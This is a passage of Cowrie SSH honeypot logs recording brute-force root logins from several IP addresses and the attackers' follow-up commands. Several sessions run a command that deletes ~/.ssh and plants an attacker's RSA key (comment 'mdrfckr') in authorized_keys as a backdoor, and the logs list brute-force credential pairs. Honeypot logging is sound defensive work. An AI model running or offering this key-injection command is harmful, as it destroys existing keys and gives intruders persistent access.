-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:06:50.995497Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.login.success","username":"root","password":"123456@qq.com","message":"login attempt [root/123456@qq.com] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:06:52.036513Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:06:52.570846Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:06:52.571517Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:06:52.572641Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:06:52.833794Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:06:53.446345Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:06:53.447025Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:06:53.708838Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:06:53.709789Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":46670,"dst_ip":"1.2.3.4","dst_port":22,"session":"4faa33f8a69f","protocol":"ssh","message":"New connection: 129.226.183.73:46670 (1.2.3.4:22) [session: 4faa33f8a69f]","sensor":"my-vps","timestamp":"2025-08-24T21:06:53.960843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:06:53.968939Z","src_ip":"129.226.183.73","session":"4faa33f8a69f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:06:54.221292Z","src_ip":"129.226.183.73","session":"4faa33f8a69f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:06:55.248305Z","src_ip":"129.226.183.73","session":"4faa33f8a69f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:06:56.510920Z","src_ip":"129.226.183.73","session":"4faa33f8a69f"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":47868,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e667241ebb9","protocol":"ssh","message":"New connection: 129.226.183.73:47868 (1.2.3.4:22) [session: 8e667241ebb9]","sensor":"my-vps","timestamp":"2025-08-24T21:06:56.765817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:06:56.768929Z","src_ip":"129.226.183.73","session":"8e667241ebb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:06:57.032355Z","src_ip":"129.226.183.73","session":"8e667241ebb9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:06:58.071629Z","src_ip":"129.226.183.73","session":"8e667241ebb9"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:06:58.336100Z","src_ip":"129.226.183.73","session":"04345f7bfd15"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:06:58.337291Z","src_ip":"129.226.183.73","session":"8e667241ebb9"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":42508,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7fa3f5bff64","protocol":"ssh","message":"New connection: 129.226.183.73:42508 (1.2.3.4:22) [session: b7fa3f5bff64]","sensor":"my-vps","timestamp":"2025-08-24T21:08:01.881848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:08:01.895642Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:08:02.158758Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.login.success","username":"root","password":"565656","message":"login attempt [root/565656] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:08:03.227497Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:08:03.818558Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:08:03.819238Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:08:03.820009Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:04.084613Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:08:04.633026Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:08:04.633702Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:08:04.902877Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:04.903955Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":43880,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef524d88711e","protocol":"ssh","message":"New connection: 129.226.183.73:43880 (1.2.3.4:22) [session: ef524d88711e]","sensor":"my-vps","timestamp":"2025-08-24T21:08:05.156037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:08:05.162937Z","src_ip":"129.226.183.73","session":"ef524d88711e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:08:05.416991Z","src_ip":"129.226.183.73","session":"ef524d88711e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:08:06.439406Z","src_ip":"129.226.183.73","session":"ef524d88711e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:07.700984Z","src_ip":"129.226.183.73","session":"ef524d88711e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":44898,"dst_ip":"1.2.3.4","dst_port":22,"session":"2062d397f81a","protocol":"ssh","message":"New connection: 129.226.183.73:44898 (1.2.3.4:22) [session: 2062d397f81a]","sensor":"my-vps","timestamp":"2025-08-24T21:08:07.963357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:08:07.971093Z","src_ip":"129.226.183.73","session":"2062d397f81a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:08:08.232314Z","src_ip":"129.226.183.73","session":"2062d397f81a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:08:09.281210Z","src_ip":"129.226.183.73","session":"2062d397f81a"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:09.547863Z","src_ip":"129.226.183.73","session":"b7fa3f5bff64"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:09.548999Z","src_ip":"129.226.183.73","session":"2062d397f81a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64586,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cb674291dd9","protocol":"ssh","message":"New connection: 217.72.205.35:64586 (1.2.3.4:22) [session: 3cb674291dd9]","sensor":"my-vps","timestamp":"2025-08-24T21:08:26.804003Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:26.805130Z","src_ip":"217.72.205.35","session":"3cb674291dd9"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":59582,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b3578eab47e","protocol":"ssh","message":"New connection: 60.221.239.232:59582 (1.2.3.4:22) [session: 3b3578eab47e]","sensor":"my-vps","timestamp":"2025-08-24T21:08:44.507423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:08:44.508372Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:08:44.704667Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234qwer","message":"login attempt [root/1234qwer] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:08:45.530233Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:08:45.968491Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:08:45.969482Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:08:45.970879Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:08:46.169015Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":39700,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c7f6c92e200","protocol":"ssh","message":"New connection: 129.226.183.73:39700 (1.2.3.4:22) [session: 8c7f6c92e200]","sensor":"my-vps","timestamp":"2025-08-24T21:09:14.058279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:09:14.061498Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
